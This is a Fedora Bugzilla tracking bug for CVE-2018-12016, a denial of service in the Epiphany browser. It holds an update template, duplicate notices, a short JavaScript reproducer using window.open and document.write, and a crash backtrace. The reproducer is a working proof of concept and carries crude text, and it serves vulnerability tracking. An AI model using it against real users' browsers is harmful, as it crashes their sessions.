Bug 1588759
Summary: | CVE-2018-12016 epiphany: Denial of service via window.open and document.write calls [fedora-all] | ||
---|---|---|---|
Product: | [Fedora] Fedora | Reporter: | Pedro Sampaio <psampaio> |
Component: | epiphany | Assignee: | Michael Catanzaro <mcatanzaro+wrong-account-do-not-cc> |
Status: | CLOSED DUPLICATE | QA Contact: | Fedora Extras Quality Assurance <extras-qa> |
Severity: | low | Docs Contact: | |
Priority: | low | ||
Version: | 28 | CC: | alexl, gecko-bugs-nobody, jhorak, john.j5live, mcatanzaro+wrong-account-do-not-cc, mclasen, phatina, rhughes, rstrode, sandmann, tpopela |
Target Milestone: | --- | Keywords: | Security, SecurityTracking |
Target Release: | --- | ||
Hardware: | Unspecified | ||
OS: | Unspecified | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | Release Note | |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2018-06-08 01:12:21 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | |||
Bug Blocks: | 1588757 |
Description
Pedro Sampaio
2018-06-07 19:45:25 UTC
Use the following template to for the 'fedpkg update' request to submit an update for this issue as it contains the top-level parent bug(s) as well as this tracking bug. This will ensure that all associated bugs get updated when new packages are pushed to stable. ===== # bugfix, security, enhancement, newpackage (required) type=security # testing, stable request=testing # Bug numbers: 1234,9876 bugs=1588757,1588759 # Description of your update notes=Security fix for [PUT CVEs HERE] # Enable request automation based on the stable/unstable karma thresholds autokarma=True stable_karma=3 unstable_karma=-3 # Automatically close bugs when this marked as stable close_bugs=True # Suggest that users restart after update suggest_reboot=False ====== Additionally, you may opt to use the bodhi web interface to submit updates: https://bodhi.fedoraproject.org/updates/new This is a duplicate of CVE-2018-11396. *** This bug has been marked as a duplicate of bug 1581801 *** *** This bug has been marked as a duplicate of bug 1581802 *** Reproducer is: <script> b1tch3z = window.open("https://www.google.com", "bl1ngbl1ng", "width=250,height=250"); b1tch3z.document.write("<p>~ua b1tch3z</p>"); // https://github.com/undergroundagency // https://github.com/ldpreload </script> Backtrace is: #0 0x00007f7225278fec in session_seems_sane (windows=<optimized out>) at ../src/ephy-session.c:833 url = 0x0 uri = <optimized out> sane = 0 t = 0x55f3a0b43e00 = {0x55f3a0b67040} w = 0x55f3a0b67120 = {0x55f3a1177b90} data = 0x55f3a16dad50 buffer = <optimized out> writer = <optimized out> w = <optimized out> ret = -1 #1 0x00007f7225278fec in save_session_sync (task=0x55f3a1715370 [GTask], source_object=<optimized out>, task_data=<optimized out>, cancellable=<optimized out>) at ../src/ephy-session.c:876 data = 0x55f3a16dad50 buffer = <optimized out> writer = <optimized out> w = <optimized out> ret = -1 #2 0x00007f7224772937 in g_task_thread_pool_thread (thread_data=0x55f3a1715370, pool_data=<optimized out>) at gtask.c:1331 task = 0x55f3a1715370 [GTask] #3 0x00007f7224afb933 in g_thread_pool_thread_proxy (data=<optimized out>) at gthreadpool.c:307 task = 0x55f3a1715370 pool = 0x7f71f8001ba0 #4 0x00007f7224afaf2a in g_thread_proxy (data=0x55f3a1667680) at gthread.c:784 thread = 0x55f3a1667680 __func__ = "g_thread_proxy" #5 0x00007f721d40e594 in start_thread (arg=<optimized out>) at pthread_create.c:463 pd = <optimized out> now = <optimized out> unwind_buf = {cancel_jmp_buf = {{jmp_buf = {140125904402176, 5452651478893192296, 140721089925406, 140721089925407, 140721089925536, 140721089925536, -5383912463950420888, -5381925658964663192}, mask_was_saved = 0}}, priv = {pad = {0x0, 0x0, 0x0, 0x0}, data = {prev = 0x0, cleanup = 0x0, canceltype = 0}}} not_first_call = <optimized out> #6 0x00007f722359700f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95 This is identical to the backtrace posted at https://bugzilla.gnome.org/show_bug.cgi?id=795740#c5. |